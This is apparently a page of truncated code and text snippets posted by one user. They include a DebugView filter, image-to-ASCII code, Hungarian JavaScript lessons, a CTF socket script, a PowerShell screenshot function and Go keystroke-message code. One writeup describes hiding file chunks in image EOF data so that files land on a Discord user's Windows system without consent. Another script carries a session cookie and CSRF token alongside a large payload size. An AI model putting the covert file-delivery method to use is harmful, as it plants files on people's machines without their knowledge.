Raffy27

DebugView Filter Definition File v1.0
*] [W]*
[Orion]*
*] [W]*
*] [E]*
*] [H]*
*] [S]*
 
 
 

Raffy27

from colorama import init, deinit, Style, Fore
from PIL import Image

def pix2str_bw(p, charset, space):
    p *= len(charset)-1
    p //= 255
    return charset[p] + ' ' * space

def pix2str(p, char, space):
    apx = [(12,12,12), (197,15,31), (19,161,14), (193,156,0), (0,55,218), (136,23,152), (58,150,221), (204,204,204),

Raffy27

Local Storage Reassembly

General

The purpose of this writeup is to document a method that can be exploited in order to transfer files to a Discord user's Windows system, without said user's explicit consent. This method does not allow for immediate and direct execution of the file, therefore it does not qualify as an individual security vulnerability.

Technique

LSR requires an image file that will not be modified by Discord. Images that have already been compressed are not modified in any way, EOF data is not trimmed or altered. Using such an image, any file can be split into chunks that (combined with the image) don't exceed 8Mb, which is the upload limit for regular Discord accounts. These images containing EOF data can be sent to a user without being altered - file hashes do not match, so remote caching can not be used, and the original image has already been compressed, thus no additional compression will take place. As soon as the user views the given conversation and the images load, they a

Raffy27

import socket
from PIL import Image
import numpy as np
from pyzbar import pyzbar
import base64
import pytesseract

CTF_IP = '35.242.239.180'
CTF_PORT = 32303
BUFSIZE = 2048

Raffy27

JavaScript alapok

Bevezetés

A JavaScript egy eredetileg webes környezetre tervezett programozási nyelv. A benne írt programokat scripteknek nevezzük, és ezek szöveg formájában tárolhatók, illetve futtathatók - nincs szükség például fordításra. Létezik több engine (motor), ami JavaScriptet futtat, ilyen például a V8, amire a Chromium böngészők és a Node.js is épül.

Környezet

A továbbiakban a következő programokra/kiegészítőkre lesz szükség:

• Node.js (v15.0.1)
• Visual Studio Code
• Live Share

Raffy27

JavaScript alapok 2

Műveletek karakterláncokkal

A karakterláncokkal (string típusú változók és konstansok) különböző műveleteket lehet végezni, amelyek segítenek ezek alakításában. Az esetek többségében kezelhetjük őket karakterek tömbjeként, ahogy a nevük is mutatja.

Hossz

A karakterlánc hosszát a length tulajdonság adja meg:

let x = 'Kerebentelen';
console.log(x.length);

Raffy27

const axios = require('axios'),
    crypto = require('crypto');

const csrfToken = 'e4g6F63fa5VaTMse',
    cookie      = 'io=nL7nTpRWQwDOFrBgAAA7; connect.sid=s%3AVQ2S5vY5mA-XY8-iIfCc6_45oORr7HIy.npEMrdSxsnN0XksRUGVx2Nuycj4h2LdaBPtaoRUNq1U',
    //Pár byte-ot módosítottam, azért nem adom oda a sütimet! Nyami
    payload     = 7.499943 * 1024 * 1024,
    cluster     = 10;

let data = {

Raffy27

[Reflection.Assembly]::LoadWithPartialName("System.Drawing")
function screenshot([Drawing.Rectangle]$bounds, $path) {
	$bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height
	$graphics = [Drawing.Graphics]::FromImage($bmp)
	
	$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)
	$bmp.Save($path)
	
	$graphics.Dispose()
	$bmp.Dispose()

Raffy27

package wmsg

import (
	"strings"
	"syscall"
	"unsafe"
)

const (
	WM_KEYDOWN = 0x0100

Raffy27

package wmsg

import (
	"bufio"
	"fmt"
	"log"
	"os"
	"runtime"
	"strings"
	"syscall"